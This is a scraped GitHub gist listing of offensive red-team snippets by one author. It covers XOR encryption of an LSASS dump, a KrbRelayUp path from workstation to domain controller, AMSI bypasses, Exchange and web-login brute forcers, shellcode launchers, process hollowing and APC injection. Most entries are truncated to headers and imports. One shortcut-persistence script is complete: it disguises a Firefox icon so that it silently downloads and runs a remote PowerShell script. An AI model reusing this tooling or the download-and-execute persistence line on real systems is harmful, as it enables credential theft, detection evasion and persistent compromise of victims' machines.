@aniqfakhrul
aniqfakhrul / xor-enc-dec.py
Created November 16, 2022 01:21
XOR Encryption Decryption with python
# Red Team Operator course code template
# payload encryption with XOR
#
# author: reenz0h (twitter: @sektor7net)
import sys
from itertools import cycle
key = bytearray("jisjidpa123","utf8")
filename = "LSASS_DECRYPTED.DMP"
@aniqfakhrul
aniqfakhrul / README.md
Last active March 21, 2024 08:56
Local Workstation to DC

From Local Workstation to DC

This exploit path only applies if you have an interactive session on a domain-joined workstation, regardless of the privilege of the account (it could be a low-privileged account).

  1. Obtain system certificate for the current workstation
KrbRelayUp.exe relay -m shadowcred -f
  1. Get the certificate and certificate password.
@aniqfakhrul
aniqfakhrul / asb_path_morse.ps1
Created August 29, 2021 06:59
RastaMouse's AmsiScanBuffer with Morse Code implementation
@aniqfakhrul
aniqfakhrul / owa_user_brute.py
Created August 24, 2021 05:08
Exchange brute force based on response time
#!/usr/bin/env python3
import requests
import sys
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import random
import string
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
hostname = "change hostname or ip"
@aniqfakhrul
aniqfakhrul / dlllauncher.cs
Created July 7, 2021 04:21
DLL Shellcode Launcher with MSBuild export
//execute with
//msiexec.exe /z C:\Users\ch4rm\Desktop\ObfuscatorXOR\Dlllauncher\bin\x64\Release\Dlllauncher.dll
using System;
using RGiesecke.DllExport;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Text;
using System.Security.Cryptography;
using System.IO;
@aniqfakhrul
aniqfakhrul / hollow_sc.cpp
Created June 24, 2021 08:24
Process Hollowing + Direct Syscalls
#include <iostream>
#include <Windows.h>
#include <TlHelp32.h>
#include <vector>
#include "aes.hpp"
#include "base64.h"
#include "low.h"
#include <string>
#include <map>
#include <sstream>
@aniqfakhrul
aniqfakhrul / shortcut.ps1
Created June 12, 2021 16:17
Persistence: Shortcut
$WshShell = New-Object -ComObject WScript.Shell
$shortcut = $WshShell.CreateShortcut("C:\Users\REUSER\Desktop\firefoxx.lnk")
$shortcut.TargetPath = "powershell.exe"
$shortcut.Description = "Totally Notmal"
$shortcut.HotKey = "F6"
$shortcut.IconLocation = "C:\Program Files\Mozilla Firefox\firefox.exe"
$shortcut.Arguments = "-windowstyle hidden iex(iwr -usebasicparsing http://example.com/notmal.ps1)"
$shortcut.save()
@aniqfakhrul
aniqfakhrul / random_cap_brute.py
Created June 7, 2021 05:42
Account Block Bypass Login (bruteforce) with random capitalization
#!/usr/bin/env python3
import random
import requests
url = "http://localhost/index.php" # change to your target url
username = "administrator"
def randomize(s):
    result = ''
    for c in s:
@aniqfakhrul
aniqfakhrul / reflective.ps1
Created May 28, 2021 09:09
Load .NET Code Reflectively + AMSI Scan Buffer Bypass
@aniqfakhrul
aniqfakhrul / APC_Injection.cs
Created May 28, 2021 09:01
Modified C# for process injection
//compile with
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;